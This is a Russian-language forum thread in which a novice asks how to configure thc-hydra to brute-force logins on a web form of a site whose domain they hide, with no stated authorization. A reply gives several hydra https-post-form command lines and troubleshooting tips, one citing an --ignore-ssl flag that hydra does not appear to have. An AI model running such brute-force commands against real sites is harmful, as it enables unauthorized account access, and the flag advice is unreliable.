• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

настройка thc-hydra

e_e

e_e

New member
27.03.2024
2
0
BIT
54
здравия, помогите пж настроить программу thc-hydra для подбора паролей под веб-форму на одном сайте, запрос на вход в аккаунт выглядит следующим образом:
1000002345.png

логин, пароль - понятно, но что насчёт значений access_token, redirect_uri, method:login?

команда, которую ввожу:

hydra -l username -p password *домен сайта скрою* https-post-form "/api/login:login=^USER^&password=^PASS^:F=400" -V

(400 - код ошибки при неудачном входе, 200 - успешная авторизация)
отказывает в авторизации, определяет все пароли как неправильные, в том числе и верный

мало шарю в теме информационной безопасности, поэтому могу тупить, уж простите
 

Вложения

  • 1000002369.png
    1000002369.png
    3,4 КБ · Просмотры: 32
  • 1000002370.png
    1000002370.png
    3,7 КБ · Просмотры: 37
Сортировать по дате Сортировать по голосам
Koloboking

Koloboking

Green Team
12.01.2017
166
52
BIT
849
  1. Проверка пути и параметров запроса: Убедитесь, что путь к API /api/login и параметры запроса login=^USER^&password=^PASS^ указаны правильно.
  2. Проверка сертификатов: Убедитесь, что сертификаты сайта корректны и не вызывают ошибок. Можно использовать параметр --ignore-ssl для игнорирования ошибок сертификатов.
  3. Добавление дополнительных заголовков или куки: Проверьте, требуются ли для успешной авторизации дополнительные заголовки или куки. Это можно сделать, используя инструменты разработчика в браузере (например, вкладка "Сеть" в Google Chrome или Firefox).

Пример команды с дополнительными параметрами​

Попробуйте следующую команду с дополнительными параметрами, если требуется игнорировать SSL ошибки:
Код: 
hydra -l username -p password *домен сайта скрою* https-post-form "/api/login:login=^USER^&password=^PASS^:F=400" -V --ignore-ssl

Если требуются дополнительные заголовки, их можно добавить следующим образом:
Код: 
hydra -l username -p password *домен сайта скрою* https-post-form "/api/login:login=^USER^&password=^PASS^:F=400:H=Content-Type: application/json" -V --ignore-ssl

Включение более подробного логирования:Используйте флаг -d для включения подробного логирования и анализа ошибок:
Код: 
hydra -l username -p password *домен сайта скрою* https-post-form "/api/login:login=^USER^&password=^PASS^:F=400" -V -d
Проверьте ответы сервера для каждого запроса, чтобы понять, почему авторизация не проходит.
 
За 0 Против
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ